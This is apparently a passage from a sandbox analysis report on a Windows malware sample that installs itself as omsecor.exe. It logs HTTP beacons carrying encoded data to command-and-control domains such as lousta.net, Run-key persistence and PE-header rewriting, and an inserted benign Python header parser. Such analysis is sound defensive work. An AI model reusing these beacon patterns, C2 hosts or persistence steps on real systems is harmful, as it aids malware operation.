                Sep 8, 2024 06:10:23.751492977 CEST | 80 | 49741 | 193.166.255.171 | 192.168.2.4
                Sep 8, 2024 06:10:45.111398935 CEST | 80 | 49741 | 193.166.255.171 | 192.168.2.4
                Sep 8, 2024 06:10:45.111484051 CEST | 49741 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:10:45.111617088 CEST | 49741 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:10:45.116381884 CEST | 80 | 49741 | 193.166.255.171 | 192.168.2.4
                Sep 8, 2024 06:10:45.229593039 CEST | 49743 | 80 | 192.168.2.4 | 64.225.91.73
                Sep 8, 2024 06:10:45.234468937 CEST | 80 | 49743 | 64.225.91.73 | 192.168.2.4
                Sep 8, 2024 06:10:45.234572887 CEST | 49743 | 80 | 192.168.2.4 | 64.225.91.73
                Sep 8, 2024 06:10:45.234721899 CEST | 49743 | 80 | 192.168.2.4 | 64.225.91.73
                Sep 8, 2024 06:10:45.239470959 CEST | 80 | 49743 | 64.225.91.73 | 192.168.2.4
                Sep 8, 2024 06:10:45.834861040 CEST | 80 | 49743 | 64.225.91.73 | 192.168.2.4
                Sep 8, 2024 06:10:45.834961891 CEST | 49743 | 80 | 192.168.2.4 | 64.225.91.73
                Sep 8, 2024 06:10:45.964600086 CEST | 49744 | 80 | 192.168.2.4 | 52.34.198.229
                Sep 8, 2024 06:10:45.969512939 CEST | 80 | 49744 | 52.34.198.229 | 192.168.2.4
                Sep 8, 2024 06:10:45.969590902 CEST | 49744 | 80 | 192.168.2.4 | 52.34.198.229
                Sep 8, 2024 06:10:45.969717979 CEST | 49744 | 80 | 192.168.2.4 | 52.34.198.229
                Sep 8, 2024 06:10:45.974445105 CEST | 80 | 49744 | 52.34.198.229 | 192.168.2.4
                Sep 8, 2024 06:10:46.699193954 CEST | 80 | 49744 | 52.34.198.229 | 192.168.2.4
                Sep 8, 2024 06:10:46.699304104 CEST | 80 | 49744 | 52.34.198.229 | 192.168.2.4
                Sep 8, 2024 06:10:46.699342966 CEST | 49744 | 80 | 192.168.2.4 | 52.34.198.229
                Sep 8, 2024 06:10:46.699381113 CEST | 49744 | 80 | 192.168.2.4 | 52.34.198.229
                Sep 8, 2024 06:10:46.700825930 CEST | 49744 | 80 | 192.168.2.4 | 52.34.198.229
                Sep 8, 2024 06:10:46.705569029 CEST | 80 | 49744 | 52.34.198.229 | 192.168.2.4
                Sep 8, 2024 06:10:46.804280043 CEST | 49745 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:10:46.809113026 CEST | 80 | 49745 | 193.166.255.171 | 192.168.2.4
                Sep 8, 2024 06:10:46.809205055 CEST | 49745 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:10:46.809555054 CEST | 49745 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:10:46.814285994 CEST | 80 | 49745 | 193.166.255.171 | 192.168.2.4
                Sep 8, 2024 06:11:08.187849045 CEST | 80 | 49745 | 193.166.255.171 | 192.168.2.4
                Sep 8, 2024 06:11:08.188034058 CEST | 49745 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:11:08.190496922 CEST | 49745 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:11:08.196855068 CEST | 80 | 49745 | 193.166.255.171 | 192.168.2.4
                Sep 8, 2024 06:11:08.304382086 CEST | 49746 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:11:08.309269905 CEST | 80 | 49746 | 193.166.255.171 | 192.168.2.4
                Sep 8, 2024 06:11:08.309390068 CEST | 49746 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:11:08.309528112 CEST | 49746 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:11:08.314253092 CEST | 80 | 49746 | 193.166.255.171 | 192.168.2.4
                Sep 8, 2024 06:11:29.708012104 CEST | 80 | 49746 | 193.166.255.171 | 192.168.2.4
                Sep 8, 2024 06:11:29.708209038 CEST | 49746 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:11:29.708329916 CEST | 49746 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:11:29.713083982 CEST | 80 | 49746 | 193.166.255.171 | 192.168.2.4
                Sep 8, 2024 06:11:29.819756031 CEST | 49743 | 80 | 192.168.2.4 | 64.225.91.73
                Sep 8, 2024 06:11:29.820064068 CEST | 49747 | 80 | 192.168.2.4 | 64.225.91.73
                Sep 8, 2024 06:11:29.827574015 CEST | 80 | 49747 | 64.225.91.73 | 192.168.2.4
                Sep 8, 2024 06:11:29.827599049 CEST | 80 | 49743 | 64.225.91.73 | 192.168.2.4
                Sep 8, 2024 06:11:29.827713966 CEST | 49743 | 80 | 192.168.2.4 | 64.225.91.73
                Sep 8, 2024 06:11:29.827929974 CEST | 49747 | 80 | 192.168.2.4 | 64.225.91.73
                Sep 8, 2024 06:11:29.828027964 CEST | 49747 | 80 | 192.168.2.4 | 64.225.91.73
                Sep 8, 2024 06:11:29.832746029 CEST | 80 | 49747 | 64.225.91.73 | 192.168.2.4
                Sep 8, 2024 06:11:30.431056023 CEST | 80 | 49747 | 64.225.91.73 | 192.168.2.4
                Sep 8, 2024 06:11:30.431154013 CEST | 49747 | 80 | 192.168.2.4 | 64.225.91.73
                Sep 8, 2024 06:11:30.539360046 CEST | 49748 | 80 | 192.168.2.4 | 52.34.198.229
                Sep 8, 2024 06:11:30.544280052 CEST | 80 | 49748 | 52.34.198.229 | 192.168.2.4
                Sep 8, 2024 06:11:30.544382095 CEST | 49748 | 80 | 192.168.2.4 | 52.34.198.229
                Sep 8, 2024 06:11:30.544548988 CEST | 49748 | 80 | 192.168.2.4 | 52.34.198.229
                Sep 8, 2024 06:11:30.549633026 CEST | 80 | 49748 | 52.34.198.229 | 192.168.2.4
                Sep 8, 2024 06:11:31.263989925 CEST | 80 | 49748 | 52.34.198.229 | 192.168.2.4
                Sep 8, 2024 06:11:31.264187098 CEST | 49748 | 80 | 192.168.2.4 | 52.34.198.229
                Sep 8, 2024 06:11:31.264245033 CEST | 80 | 49748 | 52.34.198.229 | 192.168.2.4
                Sep 8, 2024 06:11:31.264298916 CEST | 49748 | 80 | 192.168.2.4 | 52.34.198.229
                Sep 8, 2024 06:11:31.264935017 CEST | 49748 | 80 | 192.168.2.4 | 52.34.198.229
                Sep 8, 2024 06:11:31.269644022 CEST | 80 | 49748 | 52.34.198.229 | 192.168.2.4
                Sep 8, 2024 06:11:31.461023092 CEST | 49747 | 80 | 192.168.2.4 | 64.225.91.73
                Sep 8, 2024 06:11:31.482765913 CEST | 49749 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:11:31.487654924 CEST | 80 | 49749 | 193.166.255.171 | 192.168.2.4
                Sep 8, 2024 06:11:31.487795115 CEST | 49749 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:11:31.488007069 CEST | 49749 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:11:31.492760897 CEST | 80 | 49749 | 193.166.255.171 | 192.168.2.4
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Sep 8, 2024 06:09:37.850228071 CEST | 49247 | 53 | 192.168.2.4 | 1.1.1.1
                Sep 8, 2024 06:09:37.863498926 CEST | 53 | 49247 | 1.1.1.1 | 192.168.2.4
                Sep 8, 2024 06:10:00.189300060 CEST | 51870 | 53 | 192.168.2.4 | 1.1.1.1
                Sep 8, 2024 06:10:00.227742910 CEST | 53 | 51870 | 1.1.1.1 | 192.168.2.4
                Sep 8, 2024 06:10:00.962553978 CEST | 49304 | 53 | 192.168.2.4 | 1.1.1.1
                Sep 8, 2024 06:10:01.175406933 CEST | 53 | 49304 | 1.1.1.1 | 192.168.2.4
                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                Sep 8, 2024 06:09:37.850228071 CEST | 192.168.2.4 | 1.1.1.1 | 0x5738 | Standard query (0) | lousta.net | A (IP address) | IN (0x0001) | false
                Sep 8, 2024 06:10:00.189300060 CEST | 192.168.2.4 | 1.1.1.1 | 0xf579 | Standard query (0) | mkkuei4kdsz.com | A (IP address) | IN (0x0001) | false
                Sep 8, 2024 06:10:00.962553978 CEST | 192.168.2.4 | 1.1.1.1 | 0xbf57 | Standard query (0) | ow5dirasuek.com | A (IP address) | IN (0x0001) | false
                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                Sep 8, 2024 06:09:37.863498926 CEST | 1.1.1.1 | 192.168.2.4 | 0x5738 | No error (0) | lousta.net | | 193.166.255.171 | A (IP address) | IN (0x0001) | false
                Sep 8, 2024 06:10:00.227742910 CEST | 1.1.1.1 | 192.168.2.4 | 0xf579 | No error (0) | mkkuei4kdsz.com | | 64.225.91.73 | A (IP address) | IN (0x0001) | false
                Sep 8, 2024 06:10:01.175406933 CEST | 1.1.1.1 | 192.168.2.4 | 0xbf57 | No error (0) | ow5dirasuek.com | | 52.34.198.229 | A (IP address) | IN (0x0001) | false
                • lousta.net
                • mkkuei4kdsz.com
                • ow5dirasuek.com
                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                0 | 192.168.2.4 | 49730 | 193.166.255.171 | 80 | 6644 | C:\Users\user\AppData\Roaming\omsecor.exe
                Timestamp | Bytes transferred | Direction | Data
                Sep 8, 2024 06:09:37.874025106 CEST | 186 | OUT | GET /303/619.html HTTP/1.1
                From: 133702421766157995
                Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</4a.6e.5a+28/3b^a4^761d5-.3,0d,0
                Host: lousta.net
                Connection: Keep-Alive


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                1 | 192.168.2.4 | 49731 | 193.166.255.171 | 80 | 6644 | C:\Users\user\AppData\Roaming\omsecor.exe
                Timestamp | Bytes transferred | Direction | Data
                Sep 8, 2024 06:09:38.684099913 CEST | 186 | OUT | GET /895/196.html HTTP/1.1
                From: 133702421766157995
                Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</4a.6e.5a+28/3b^a4^761d5-.3,0d,0
                Host: lousta.net
                Connection: Keep-Alive


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                2 | 192.168.2.4 | 49738 | 64.225.91.73 | 80 | 6644 | C:\Users\user\AppData\Roaming\omsecor.exe
                Timestamp | Bytes transferred | Direction | Data
                Sep 8, 2024 06:10:00.233843088 CEST | 191 | OUT | GET /100/325.html HTTP/1.1
                From: 133702421766157995
                Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</4a.6e.5a+28/3b^a4^761d5-.3,0d,0
                Host: mkkuei4kdsz.com
                Connection: Keep-Alive
                Sep 8, 2024 06:10:00.848057985 CEST | 816 | IN | HTTP/1.1 200 OK
                server: nginx/1.18.0 (Ubuntu)
                date: Sun, 08 Sep 2024 04:10:00 GMT
                content-type: text/html
                content-length: 593
                last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                etag: "63f68860-251"
                accept-ranges: bytes
                Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                3 | 192.168.2.4 | 49739 | 52.34.198.229 | 80 | 6644 | C:\Users\user\AppData\Roaming\omsecor.exe
                Timestamp | Bytes transferred | Direction | Data
                Sep 8, 2024 06:10:01.182065964 CEST | 191 | OUT | GET /179/569.html HTTP/1.1
                From: 133702421766157995
                Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</4a.6e.5a+28/3b^a4^761d5-.3,0d,0
                Host: ow5dirasuek.com
                Connection: Keep-Alive
                Sep 8, 2024 06:10:01.918982983 CEST | 413 | IN | HTTP/1.1 200 OK
                Server: nginx
                Date: Sun, 08 Sep 2024 04:10:01 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: btst=96b9553d4f1c07b4ccb89e66c39fa5d4|8.46.123.33|1725768601|1725768601|0|1|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                4 | 192.168.2.4 | 49740 | 193.166.255.171 | 80 | 3868 | C:\Windows\SysWOW64\omsecor.exe
                Timestamp | Bytes transferred | Direction | Data
                Sep 8, 2024 06:10:02.242902994 CEST | 186 | OUT | GET /467/386.html HTTP/1.1
                From: 133702422009751771
                Via: hprkjvr_vjwA<19cdsifA:_tfser>5514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26
                Host: lousta.net
                Connection: Keep-Alive


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                5 | 192.168.2.4 | 49741 | 193.166.255.171 | 80 | 3868 | C:\Windows\SysWOW64\omsecor.exe
                Timestamp | Bytes transferred | Direction | Data
                Sep 8, 2024 06:10:23.746695995 CEST | 185 | OUT | GET /976/76.html HTTP/1.1
                From: 133702422009751771
                Via: hprkjvr_vjwA<19cdsifA:_tfser>5514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26
                Host: lousta.net
                Connection: Keep-Alive


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                6 | 192.168.2.4 | 49743 | 64.225.91.73 | 80 | 3868 | C:\Windows\SysWOW64\omsecor.exe
                Timestamp | Bytes transferred | Direction | Data
                Sep 8, 2024 06:10:45.234721899 CEST | 190 | OUT | GET /130/71.html HTTP/1.1
                From: 133702422009751771
                Via: hprkjvr_vjwA<19cdsifA:_tfser>5514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26
                Host: mkkuei4kdsz.com
                Connection: Keep-Alive
                Sep 8, 2024 06:10:45.834861040 CEST | 816 | IN | HTTP/1.1 200 OK
                server: nginx/1.18.0 (Ubuntu)
                date: Sun, 08 Sep 2024 04:10:45 GMT
                content-type: text/html
                content-length: 593
                last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                etag: "63f68860-251"
                accept-ranges: bytes
                Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                7 | 192.168.2.4 | 49744 | 52.34.198.229 | 80 | 3868 | C:\Windows\SysWOW64\omsecor.exe
                Timestamp | Bytes transferred | Direction | Data
                Sep 8, 2024 06:10:45.969717979 CEST | 295 | OUT | GET /59/409.html HTTP/1.1
                From: 133702422009751771
                Via: hprkjvr_vjwA<19cdsifA:_tfser>5514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26
                Host: ow5dirasuek.com
                Connection: Keep-Alive
                Cookie: snkz=8.46.123.33; btst=96b9553d4f1c07b4ccb89e66c39fa5d4|8.46.123.33|1725768601|1725768601|0|1|0
                Sep 8, 2024 06:10:46.699193954 CEST | 337 | IN | HTTP/1.1 200 OK
                Server: nginx
                Date: Sun, 08 Sep 2024 04:10:46 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: btst=96b9553d4f1c07b4ccb89e66c39fa5d4|8.46.123.33|1725768646|1725768601|22|2|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                8 | 192.168.2.4 | 49745 | 193.166.255.171 | 80 | 3868 | C:\Windows\SysWOW64\omsecor.exe
                Timestamp | Bytes transferred | Direction | Data
                Sep 8, 2024 06:10:46.809555054 CEST | 186 | OUT | GET /347/423.html HTTP/1.1
                From: 133702422009751771
                Via: hprkjvr_vjwA<19cdsifA:_tfser>6514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26
                Host: lousta.net
                Connection: Keep-Alive


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                9 | 192.168.2.4 | 49746 | 193.166.255.171 | 80 | 3868 | C:\Windows\SysWOW64\omsecor.exe
                Timestamp | Bytes transferred | Direction | Data
                Sep 8, 2024 06:11:08.309528112 CEST | 186 | OUT | GET /601/938.html HTTP/1.1
                From: 133702422009751771
                Via: hprkjvr_vjwA<19cdsifA:_tfser>6514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26
                Host: lousta.net
                Connection: Keep-Alive


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                10 | 192.168.2.4 | 49747 | 64.225.91.73 | 80 | 3868 | C:\Windows\SysWOW64\omsecor.exe
                Timestamp | Bytes transferred | Direction | Data
                Sep 8, 2024 06:11:29.828027964 CEST | 190 | OUT | GET /88/221.html HTTP/1.1
                From: 133702422009751771
                Via: hprkjvr_vjwA<19cdsifA:_tfser>6514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26
                Host: mkkuei4kdsz.com
                Connection: Keep-Alive
                Sep 8, 2024 06:11:30.431056023 CEST | 816 | IN | HTTP/1.1 200 OK
                server: nginx/1.18.0 (Ubuntu)
                date: Sun, 08 Sep 2024 04:11:30 GMT
                content-type: text/html
                content-length: 593
                last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                etag: "63f68860-251"
                accept-ranges: bytes
                Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                11 | 192.168.2.4 | 49748 | 52.34.198.229 | 80 | 3868 | C:\Windows\SysWOW64\omsecor.exe
                Timestamp | Bytes transferred | Direction | Data
                Sep 8, 2024 06:11:30.544548988 CEST | 297 | OUT | GET /968/405.html HTTP/1.1
                From: 133702422009751771
                Via: hprkjvr_vjwA<19cdsifA:_tfser>6514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26
                Host: ow5dirasuek.com
                Connection: Keep-Alive
                Cookie: snkz=8.46.123.33; btst=96b9553d4f1c07b4ccb89e66c39fa5d4|8.46.123.33|1725768646|1725768601|22|2|0
                Sep 8, 2024 06:11:31.263989925 CEST | 337 | IN | HTTP/1.1 200 OK
                Server: nginx
                Date: Sun, 08 Sep 2024 04:11:31 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: btst=96b9553d4f1c07b4ccb89e66c39fa5d4|8.46.123.33|1725768691|1725768601|33|3|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                12 | 192.168.2.4 | 49749 | 193.166.255.171 | 80 | 564 | C:\Windows\SysWOW64\omsecor.exe
                Timestamp | Bytes transferred | Direction | Data
                Sep 8, 2024 06:11:31.488007069 CEST | 161 | OUT | GET /161/343.html HTTP/1.1
                From: 133702422009751771
                Via: opfcsi{>;56bttA;346_ojzA97f89j88f55=96ghd9h:;;g:71863i63
                Host: lousta.net
                Connection: Keep-Alive



                Target ID:0
                Start time:00:09:36
                Start date:08/09/2024
                Path:C:\Users\user\Desktop\cnzWgjUhS2.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\cnzWgjUhS2.exe"
                Imagebase:0x400000
                File size:36'600 bytes
                MD5 hash:10B089F41384787F77A9DE73A9C55E4B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                Target ID:1
                Start time:00:09:36
                Start date:08/09/2024
                Path:C:\Users\user\AppData\Roaming\omsecor.exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\AppData\Roaming\omsecor.exe
                Imagebase:0x400000
                File size:36'600 bytes
                MD5 hash:BA4DF80E161C9C58860725AAC02D99E4
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML
                Reputation:low
                Has exited:true

                Target ID:5
                Start time:00:10:00
                Start date:08/09/2024
                Path:C:\Windows\SysWOW64\omsecor.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\System32\omsecor.exe
                Imagebase:0x400000
                File size:36'600 bytes
                MD5 hash:9AF480E9873460DD811C495A948A78AE
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML
                Reputation:low
                Has exited:true

                Target ID:8
                Start time:00:11:30
                Start date:08/09/2024
                Path:C:\Windows\SysWOW64\omsecor.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\omsecor.exe /nomove
                Imagebase:0x400000
                File size:36'600 bytes
                MD5 hash:9AF480E9873460DD811C495A948A78AE
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:false

                  APIs
                  • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004075FC
                  • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                  • GetFileSize.KERNEL32(?,00000000), ref: 0040762E
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407638
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040763F
                  • ReadFile.KERNELBASE(?,00000000,00000000,?,00000000), ref: 00407660
                  • WriteFile.KERNELBASE(?,?,00000000,?,00000000), ref: 0040767F
                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000), ref: 00407691
                  • ReadFile.KERNELBASE(?,?,00000040,?,00000000), ref: 004076A1
                  • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076AF
                  • ReadFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 004076C5
                  • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076EF
                  • WriteFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 00407705
                  • FindCloseChangeNotification.KERNELBASE(?), ref: 00407714
                  • CloseHandle.KERNEL32(?), ref: 00407719
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                  Similarity
                  • API ID: File$PointerRead$CloseCreateHeapWrite$AllocateChangeFindHandleNotificationProcessSize
                  • String ID:
                  • API String ID: 3476270553-0
                  • Opcode ID: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                  • Instruction ID: 7ae3b020874f099f6a4231377d147a855b3f50186be4225f3fece46b7b724b47
                  • Opcode Fuzzy Hash: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                  • Instruction Fuzzy Hash: F0416A71901028BADB209BA2DD48EEFBF7DEF45390F104476F619F21A0D7709A10DB64
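The call sequence above copies one file into a second one opened with GENERIC_READ|GENERIC_WRITE and CREATE_ALWAYS (GetFileSize, RtlAllocateHeap, ReadFile, WriteFile), then reads 0x40 bytes at offset 0, seeks, reads 0xF8 bytes, seeks again and writes 0xF8 bytes back. 0x40 is sizeof(IMAGE_DOS_HEADER) and 0xF8 is sizeof(IMAGE_NT_HEADERS32) (4-byte signature + 20-byte file header + 224-byte PE32 optional header), so the reading taken here, as an assumption, is that the seek target is e_lfanew and the write-back rewrites the copy's NT headers. That is consistent with the three 36'600-byte omsecor.exe/cnzWgjUhS2.exe files listed above carrying three different MD5s, and the hard-coded 0xF8 only fits PE32 (a PE32+ optional header is 240 bytes), matching the "Uses 32bit PE files" signature. Which fields change is not visible in the report. The following is an added example, not code from the report or the sample: it parses the same two regions and diffs them between an original and a copy, which is the check an analyst would run on such a pair.

```python
"""Parse the 0x40-byte DOS header and 0xF8-byte PE32 NT headers (added example)."""
import struct

DOS_HEADER_SIZE = 0x40     # sizeof(IMAGE_DOS_HEADER)
NT_HEADERS32_SIZE = 0xF8   # Signature + IMAGE_FILE_HEADER + IMAGE_OPTIONAL_HEADER32
_FILE_HDR = "<HHIIIHH"     # Machine .. Characteristics, 20 bytes


def build_minimal_pe32(entry_rva=0x1000, image_base=0x400000, e_lfanew=0x80,
                       characteristics=0x0102):
    """Constructed sample: a headers-only PE32 image, not a loadable binary."""
    dos = bytearray(DOS_HEADER_SIZE)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)              # e_lfanew
    stub = bytes(e_lfanew - DOS_HEADER_SIZE)                 # zeroed DOS stub
    file_hdr = struct.pack(_FILE_HDR, 0x14C, 1, 0, 0, 0, 224, characteristics)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                    # Magic: PE32
    struct.pack_into("<I", opt, 16, entry_rva)               # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, image_base)              # ImageBase
    struct.pack_into("<I", opt, 60, 0x200)                   # SizeOfHeaders
    nt = b"PE\0\0" + file_hdr + bytes(opt)
    assert len(nt) == NT_HEADERS32_SIZE
    return bytes(dos) + stub + nt


def read_headers(image: bytes) -> dict:
    """Mirror the sample's reads: 0x40 bytes at offset 0, then 0xF8 bytes at e_lfanew."""
    dos = image[:DOS_HEADER_SIZE]
    if len(dos) < DOS_HEADER_SIZE or dos[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", dos, 0x3C)[0]
    nt = image[e_lfanew:e_lfanew + NT_HEADERS32_SIZE]
    if len(nt) != NT_HEADERS32_SIZE or nt[:4] != b"PE\0\0":
        raise ValueError("missing or truncated NT headers")
    machine, nsec, _, _, _, opt_size, chars = struct.unpack_from(_FILE_HDR, nt, 4)
    magic = struct.unpack_from("<H", nt, 24)[0]
    if magic != 0x10B or opt_size != 224:
        # PE32+ (0x20B) has a 240-byte optional header; a fixed 0xF8 read is wrong there.
        raise ValueError("not a PE32 optional header")
    return {
        "e_lfanew": e_lfanew,
        "Machine": machine,
        "NumberOfSections": nsec,
        "Characteristics": chars,
        "AddressOfEntryPoint": struct.unpack_from("<I", nt, 24 + 16)[0],
        "ImageBase": struct.unpack_from("<I", nt, 24 + 28)[0],
        "SizeOfHeaders": struct.unpack_from("<I", nt, 24 + 60)[0],
    }


def nt_header_diff(original: bytes, copy: bytes):
    """Header fields that differ between two images, as (name, old, new) tuples."""
    a, b = read_headers(original), read_headers(copy)
    return [(k, a[k], b[k]) for k in a if a[k] != b[k]]
```

Run nt_header_diff() over the dropped omsecor.exe copies against the original sample to see what the 0xF8-byte write-back actually changes; the function raises rather than guessing when the input is not PE32.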
                  APIs
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,?,?, /nomove,?,0040AB30,?), ref: 0040AC44
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,?,?, /nomove,?,0040AB30,?), ref: 0040AC72
                  • FindFirstFileW.KERNEL32(?,00000000), ref: 0040AC03
                  • FindClose.KERNEL32(00000000), ref: 0040AC0F
                  Similarity
                  • API ID: FindOpen$CloseFileFirst
                  • String ID:
                  • API String ID: 3155378417-0
                  • Opcode ID: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                  • Instruction ID: fa0310e4c65bbc590993533f650c85f5e3ee77ef27cd51fa1c8f473dbf319076
                  • Opcode Fuzzy Hash: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                  • Instruction Fuzzy Hash: 5DE0D87160C7044BE220E7B49D0C967B3DCAB45325F000F36A9B6E20C0FA38D46A465F
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B36C
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B39D
